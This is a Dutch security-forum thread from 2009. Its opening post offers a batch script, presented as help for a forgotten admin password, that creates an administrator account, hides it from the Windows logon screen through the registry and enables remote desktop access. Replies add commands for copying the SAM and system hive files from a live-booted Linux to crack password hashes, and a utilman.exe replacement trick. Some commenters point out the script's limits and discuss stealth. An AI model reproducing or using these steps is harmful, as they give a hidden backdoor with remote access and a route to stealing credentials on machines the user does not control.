Computerbeveiliging - Hoe je bad guys buiten de deur houdt

Hoe maak je een verborgen Admin account...

27-02-2009, 23:21 door _nip3r, 21 reacties
Hier een handigheidje voor als je je admin password bent vergeten.
knip en plak de volgende code in kladblok, save het als watjewilt.bat en run het script

===============================================================================
@Echo Off

SET /P usr=[Type hier nieuwe gebruikers naam:]

SET /P pwd=[Typ hier uw nieuwe password:]

:: SET /P Neemt de input en geeft het een vaiable

echo — Aanmaken Nieuwe Gebruiker, “%usr%” with password “%pwd%” –

net user “%usr%” “%pwd%” /add

echo — Toevoegen Gebruiker bij de Groep Administrator –

net localgroup Administrators %usr% /add

echo — Gebruiker Is Nu Administrator — >>

echo — Verborgen gebruiker –

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v %usr% /t REG_DWORD /d 0 /f

echo — Activeer Terminal Service –

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

echo — Activering Terminal Service Klaar –

SET /P =Druk enter om door te gaan . . .

Exit

=============================================================================
Reacties (21)
28-02-2009, 18:23 door Anoniem
Huh, gaat dat aanmaken via 'net'?

Jezus...
28-02-2009, 18:33 door Anoniem
Dit werkt alleen als je als admin inlogt. Hoe gaat dat zonder wachtwoord?

Het is ook maar goed dat dit niet lukt!
28-02-2009, 21:16 door [Account Verwijderd]
[Verwijderd]
28-02-2009, 21:32 door _nip3r
klopt...als je je password terug wilt, moet je booten met een ander systeem...dus linux...en probeer je de sam file te kraken...
28-02-2009, 22:30 door Ina Ninck
Kun je dit als gewone gebruiker uitvoeren?
Als je dit alleen als admin kan uitvoeren waarvan
je het passwd niet weet dan wordt het een beetje
lastig, dunkt mij...........
28-02-2009, 22:54 door _nip3r
Probeer het, en kijk dan naar de user accounts...daar moet je jezelf admin rechten geven...als je een andere truck wilt, laat het dan hier ff weten, dan omzeilen we een aantal zaken...ik zal ff een tut schrijven..
01-03-2009, 14:57 door Anoniem
Door $nip3rklopt...als je je password terug wilt, moet je booten met een ander systeem...dus linux...en probeer je de sam file te kraken...

vraag me af hoe je eens sam file kraakt, meestal haal je de ntlm hashes eruit en kraak je die ;), en sinds wanneer is dit de plaats voor fxpscene tutorials ;)?

-reverze
01-03-2009, 15:40 door Anoniem
Als je geen admin bent , kan je ook geen admin account aanmaken heeft dus geen zin.
01-03-2009, 15:40 door Anoniem

Hier een handigheidje voor als je je admin password bent vergeten.

ik maak altijd dan een batch file die het wachtwoord veranderd van admin en dat compileer ik dan naar een EXE bestand en save ik in c:\windows\system32 als utilman.exe en wanneer je dan het wachtwoord bent vergeten druk je gewoon op winlogo+U en het wachtwoord is gereset.
01-03-2009, 19:58 door _nip3r
Hier wat instructies die ik heb gemaakt om snel de SAM en system file naar een usb te copieeren.
(je usb moet eerst een partitie hebben, zodat knoppix-S-T-D het kan herkennen als FAT)

1- Steek je USB erin
2-Boot met knoppix-S-T-D,
3-Als je een prompt krijgt, druk enter
5-Bij root, typ je:


# mkdir /mnt/hda1
# mount -r /dev/hda1 /mnt/hda1
# mkdir /mnt/fatstick
# mount -t vfat /dev/sda1 /mnt/fatstick
# cd /mnt/fatstick
# mkdir (machinename)
# cd (machinename)
# cp /mnt/hda1/WINDOWS/system32/config/SAM sam
# cp /mnt/hda1/WINDOWS/system32/config/system system
# shutdown -h now

6-Haal cd eruit, power off
7-En crack de hashes met L0phtCrack of LC5
02-03-2009, 10:56 door Anoniem
wat is hier verborgen aan?
02-03-2009, 12:02 door Anoniem
Dit lukt alleen als je al als admin bent ingelogd. Beetje hetzelfde principe als "Indien u geen email kunt verzenden, stuur dan een mail naar de helpdesk."
02-03-2009, 12:52 door wimbo
bruteforcen is helemaal niet nodig.
Gewoon een tool in de SAM en versleutelde wachtwoord laten vervangen en klaar is klara.
http://home.eunet.no/pnordahl/ntpasswd/

Daarnaast werkt het admin account aanmaken van de topic starter alleen maar als je zelf ook admin bent een normale gebruiker kan geen admins aanmaken of aanpassen.
Een aangezien je admin bent (om dat script te runnen) is het net zo eenvoudig om het via de reguliere weg te wijzigen.
02-03-2009, 13:55 door Sokolum
Door $nip3r

# cp /mnt/hda1/WINDOWS/system32/config/SAM sam
# cp /mnt/hda1/WINDOWS/system32/config/system system

Dit zijn inderdaad de *twee* belangrijke files om een lokale admin acccount password te bruteforcen, klopt inderdaad ja.
Om die files te kopiëren kan je bijvoorbeeld een bootable DOS USB disk aanmaken met daarop NTFSPRO, of een Linux distributie :D
Allebei net zo makkelijk.
02-03-2009, 13:57 door Sokolum
Door wimbobruteforcen is helemaal niet nodig.
Gewoon een tool in de SAM en versleutelde wachtwoord laten vervangen en klaar is klara.
http://home.eunet.no/pnordahl/ntpasswd/

Hahahahahahahahahhaha geweldig nog noooit aangedacht LOL
Als dat werkt... Maar dan ben je wel gesnapt ;)

Leuk zo'n topic :D
03-03-2009, 17:48 door Anoniem
Bij mij werkt het niet.........bij jullie wel?
04-03-2009, 13:40 door Anoniem
Door AnoniemBij mij werkt het niet.........bij jullie wel?

bij mij ook niet, zelfs met sudo niet ;)

-reverze
05-03-2009, 13:58 door Anoniem
loptcrack anyone ?
06-03-2009, 09:12 door Anoniem
Vooral RED ADD ziet er strak uit. Je verwacht met zo'n commando ook nooit kritische problemen
19-03-2009, 13:12 door wimbo
Door Sokolum
Door wimbobruteforcen is helemaal niet nodig.
Gewoon een tool in de SAM en versleutelde wachtwoord laten vervangen en klaar is klara.
http://home.eunet.no/pnordahl/ntpasswd/

Hahahahahahahahahhaha geweldig nog noooit aangedacht LOL
Als dat werkt... Maar dan ben je wel gesnapt ;)

Leuk zo'n topic :D
er is een verschil tussen toegang krijgen tot het systeem (als je zelf bent buiten gesloten) en STIEKEM 'mee kunnen kijken'.
In het eerste geval maakt het niet uit dat een nieuw wachtwoord aanmaakt. Niemand die daar last van heeft, want je bent zelf al admin.
In het tweede geval moet je stealthy-er te werk want anders wordt je 'gepakt'.
19-03-2009, 16:26 door Anoniem
ERD disk erin en password resetten vd admin en je bent klaar.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.